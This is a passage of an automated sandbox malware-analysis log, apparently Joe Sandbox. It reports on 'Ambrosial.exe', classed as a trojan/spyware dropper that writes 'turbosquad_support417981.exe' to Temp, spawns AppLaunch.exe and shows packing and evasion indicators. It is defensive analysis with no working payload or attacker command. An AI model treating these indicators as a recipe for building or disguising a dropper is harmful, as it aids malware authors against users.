              Source: turbosquad_support417981.exe.0.drStatic PE information: Number of sections : 12 > 10
              Source: Ambrosial.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeFile created: C:\Windows\Fonts\Azonix.otfJump to behavior
              Source: Ambrosial.exe.0.drStatic PE information: No import functions for PE file found
              Source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGuna.UI2.dllD vs Ambrosial.exe
              Source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Ambrosial.exe
              Source: GunaDotNetRT64.dll.3.drStatic PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: GunaDotNetRT64.dll.3.drStatic PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: turbosquad_support417981.exe.0.drStatic PE information: Section: ZLIB complexity 0.999274553571
              Source: turbosquad_support417981.exe.0.drStatic PE information: Section: ZLIB complexity 0.997477213542
              Source: turbosquad_support417981.exe.0.drStatic PE information: Section: ZLIB complexity 1.00016176189
              Source: turbosquad_support417981.exe.0.drStatic PE information: Section: .boot ZLIB complexity 0.993467738002
              Source: Ambrosial.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeFile created: C:\Users\user\Desktop\Azonix.otfJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/29@2/4
              Source: C:\Users\user\Desktop\Ambrosial.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: Ambrosial.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
              Source: Ambrosial.exe, 00000003.00000003.539083338.0000020255DFA000.00000004.00000001.sdmpBinary or memory string: bited.slnt
              Source: Ambrosial.exeVirustotal: Detection: 38%
              Source: C:\Users\user\Desktop\Ambrosial.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Ambrosial.exe 'C:\Users\user\Desktop\Ambrosial.exe'
              Source: C:\Users\user\Desktop\Ambrosial.exeProcess created: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe 'C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe'
              Source: C:\Users\user\Desktop\Ambrosial.exeProcess created: C:\Users\user\AppData\Local\Temp\Ambrosial.exe 'C:\Users\user\AppData\Local\Temp\Ambrosial.exe'
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 516
              Source: C:\Users\user\Desktop\Ambrosial.exeProcess created: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe 'C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe' Jump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeProcess created: C:\Users\user\AppData\Local\Temp\Ambrosial.exe 'C:\Users\user\AppData\Local\Temp\Ambrosial.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
              Source: C:\Users\user\Desktop\Ambrosial.exeFile created: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5744
              Source: Ambrosial.exe.0.dr, Ambrosial/Ambrosial/Classes/Cipher.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.3.turbosquad_support417981.exe.2e00000.0.unpack, ue03d.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.3.turbosquad_support417981.exe.2e00000.0.unpack, ue061.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.AppLaunch.exe.400000.0.unpack, ue03d.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.AppLaunch.exe.400000.0.unpack, ue061.csCryptographic APIs: 'CreateDecryptor'
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Ambrosial.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Ambrosial.exeStatic file information: File size 27613184 > 1048576
              Source: Ambrosial.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1a24c00
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdbg source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: fltLib.pdb/ source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp
              Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: Ambrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: shcore.pdby source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|52414EC411DEA325110F0AD21378C8D101897989|2544 source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: costura.costura.pdb.compressed source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: E:\buildslave\win\64x\ambrosial-64xR\Ambrosial\Ambrosial\obj\x64\Release\Ambrosial.pdb source: Ambrosial.exe, 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Ambrosial.exe, 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: shell32.pdbK source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: combase.pdba source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdbW source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: sechost.pdbk source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: D:\Projects\Guna.UI2\Build\Guna.UI2.WinForms\build\nuget\release\Guna.UI2.pdb source: Ambrosial.exe, 00000003.00000003.523261595.00000202576B4000.00000004.00000001.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.346772884.00000000048D7000.00000004.00000040.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.346758820.00000000048D0000.00000004.00000040.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.346735935.0000000004901000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Yara detected Costura Assembly LoaderShow sources
              Source: Yara matchFile source: 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Ambrosial.exe PID: 5564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Ambrosial.exe PID: 5472, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Ambrosial.exe, type: DROPPED
              .NET source code contains potential unpackerShow sources
              Source: 2.3.turbosquad_support417981.exe.2e00000.0.unpack, ue05f.cs.Net Code: ? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.AppLaunch.exe.400000.0.unpack, ue05f.cs.Net Code: ? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push ecx; mov dword ptr [esp], eax2_2_0061083B
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push ebx; mov dword ptr [esp], eax2_2_0061096A
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push eax; mov dword ptr [esp], 0000012Ch2_2_0061096F
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push 6AA2E1E5h; mov dword ptr [esp], ebx2_2_00610D28
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push ebp; mov dword ptr [esp], 6C4ACF19h2_2_00610D3B
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push 6358803Ch; mov dword ptr [esp], eax2_2_00610E6F
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push ecx; mov dword ptr [esp], 31342D37h2_2_00610E73
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push edi; mov dword ptr [esp], edx2_2_006114B1
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push edx; mov dword ptr [esp], 4367C2FEh2_2_006114B5
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push 2C9C1313h; mov dword ptr [esp], edi2_2_00611978
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push 6CFA6BDCh; mov dword ptr [esp], ebx2_2_006122F9
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push 6219499Ah; mov dword ptr [esp], ebp2_2_0061247C
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push esi; mov dword ptr [esp], 5E6F1367h2_2_00612480
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push eax; mov dword ptr [esp], 435F574Fh2_2_006126CF
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push 270BC0BFh; mov dword ptr [esp], edx2_2_006127A4
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push 5E176DEDh; mov dword ptr [esp], eax2_2_0061292C
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push edi; mov dword ptr [esp], 0AFAE346h2_2_00613002
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push esi; mov dword ptr [esp], ecx2_2_00613023
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push ebx; mov dword ptr [esp], edx2_2_00613039
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push eax; mov dword ptr [esp], 3DDCEF62h2_2_0061306C
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push esi; mov dword ptr [esp], ebx2_2_0061309D
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeCode function: 2_2_00519153 push ebp; mov dword ptr [esp], ecx2_2_006134E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_097438F5 pushad ; retf 4_2_097438F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_09744BCB pushfd ; ret 4_2_09744BCC
              Source: Ambrosial.exe.0.drStatic PE information: 0xEF876214 [Sun May 5 21:18:12 2097 UTC]
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name:
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name: .debug
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name: .B1uj23u
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name: .B1uj23u
              Source: turbosquad_support417981.exe.0.drStatic PE information: section name: .boot
              Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
              Source: Ambrosial.exeStatic PE information: real checksum: 0x1a570a1 should be:
              Source: Ambrosial.exe.0.drStatic PE information: real checksum: 0x0 should be:
              Source: turbosquad_support417981.exe.0.drStatic PE information: real checksum: 0x191269 should be: 0x1958a2
              Source: initial sampleStatic PE information: section name: entropy: 7.99696760481
              Source: initial sampleStatic PE information: section name: entropy: 7.59666095342
              Source: initial sampleStatic PE information: section name: .boot entropy: 7.95745327215
              Source: C:\Users\user\Desktop\Ambrosial.exeFile created: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeFile created: C:\Users\user\AppData\Local\Temp\0e1a63fc-9228-4b4f-96fc-fee060f96e92\GunaDotNetRT64.dllJump to dropped file
              Source: C:\Users\user\Desktop\Ambrosial.exeFile created: C:\Users\user\AppData\Local\Temp\Ambrosial.exeJump to dropped file
              Source: C:\Users\user\Desktop\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
